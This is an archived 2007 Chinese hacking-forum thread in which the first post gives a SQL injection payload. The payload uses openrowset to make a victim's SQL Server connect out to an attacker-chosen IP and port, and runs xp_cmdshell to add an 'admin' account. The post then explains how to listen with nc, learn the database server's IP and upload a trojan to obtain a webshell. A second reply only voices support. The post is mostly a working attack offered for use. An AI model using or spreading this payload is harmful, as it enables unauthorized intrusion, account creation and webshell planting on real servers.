岁月联盟 - 技术社区 - BBS.SYUE.COM's Archiver

猪猪 发表于 2007-9-14 08:42

注入得到数据库返回IP

[code]and 1=(select * from openrowset('sqloledb','server=127.0.0.1,5200;uid=Name;pwd=Pass','select user;exec master.dbo.xp_cmdshell [net user admin admin /add]'))--[/code]//通常注入时。。WEB和SQL分离 想得到对方SQL服务器IP看看有没开放WEB 用以上语句能取得 然后辈分个小马上去得到WEBSHELL 前提是SQL服务器能上网并且能外连。。

本地NC 监听一个端口 上面语句中的IP端口改为自己监听的。。

yas 发表于 2007-9-14 22:45

支持,学习。。。。。。。。。。。。。。。。

页: [1]

Powered by Discuz! Archiver 6.1.0  © 2001-2007 Comsenz Inc.